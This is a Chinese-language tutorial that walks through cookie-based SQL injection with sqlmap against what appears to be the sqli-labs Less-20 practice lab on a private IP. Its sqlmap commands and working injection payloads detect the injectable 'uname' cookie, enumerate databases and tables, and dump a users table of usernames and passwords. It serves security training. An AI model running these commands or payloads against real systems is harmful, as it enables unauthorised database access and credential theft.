Sqlmap2021 -- Cookie注入

喧闹任其喧闹，自有我自为之，我自风情万种，与世无争。。。

----  网易云热评

一、检测Cookie注入

1、通过BurpSuite抓包，将封包内容保存到1.txt

GET /sqli/Less-20/index.php HTTP/1.1

Host: 192.168.139.129

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/sqli/Less-20/index.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

2、判断是否存在注入

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2

--cookie：指定参数

--level 2：等级2以上才会检测cookie注入

运行结果：

[16:44:49] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                                             

Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:

---

Parameter: uname (Cookie)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: uname=admin' AND 6679=6679 AND 'sdQh'='sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

    Type: error-based

    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)

    Payload: uname=admin' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(6429=6429,1))),0x717a767a71),6429) AND 'whpT'='whpT; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

    Type: UNION query

    Title: Generic UNION query (NULL) - 3 columns

    Payload: uname=-4950' UNION ALL SELECT NULL,CONCAT(0x7162717171,0x4f62636a6e49426b5a415141657259517971566f6463496b714561576f4d58446459787146754d78,0x717a767a71),NULL-- -; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

---

[16:44:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[16:44:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'   

二、获取数据库

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 --dbs

 

运行结果：

[16:57:57] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP 5.4.45

back-end DBMS: MySQL >= 5.6

[16:57:57] [INFO] fetching database names

do you want to URL encode cookie values (implementation specific)? [Y/n]

[16:57:59] [WARNING] reflective value(s) found and filtering out

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[16:57:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security --tables

 

运行结果：

[17:05:15] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:05:15] [INFO] fetching tables for database: 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:05:16] [WARNING] reflective value(s) found and filtering out

Database: security

[4 tables]

+----------+

| emails   |

| referers |

| uagents  |

| users    |

+----------+

[17:05:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

四、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --columns

 

运行结果：

[17:07:37] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:07:37] [INFO] fetching columns for table 'users' in database 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:07:38] [WARNING] reflective value(s) found and filtering out

Database: security

Table: users

[3 columns]

+----------+-------------+

| Column   | Type        |

+----------+-------------+

| id       | int(3)      |

| password | varchar(20) |

| username | varchar(20) |

+----------+-------------+

[17:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

五、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"

 

运行结果：

[17:09:08] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:09:08] [INFO] fetching columns for table 'users' in database 'security'

[17:09:08] [INFO] fetching entries for table 'users' in database 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:09:09] [WARNING] reflective value(s) found and filtering out

Database: security

Table: users

[13 entries]

+----+------------+----------+

| id | password   | username |

+----+------------+----------+

| 1  | Dumb       | Dumb     |

| 2  | I-kill-you | Angelina |

| 3  | p@ssword   | Dummy    |

| 4  | crappy     | secure   |

| 5  | stupidity  | stupid   |

| 6  | genious    | superman |

| 7  | mob!le     | batman   |

| 8  | admin      | admin    |

| 9  | admin1     | admin1   |

| 10 | admin2     | admin2   |

| 11 | admin3     | admin3   |

| 12 | dumbo      | dhakkan  |

| 14 | admin4     | admin4   |

+----+------------+----------+

[17:09:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'                                              

[17:09:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

六、其他检测Cookie注入方法

1、检测是否存在注入

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2

2、获取数据库名称

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 --dbs

3、获取表名

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security --tables

4、获取字段名

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --columns

5、获取字段内容

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧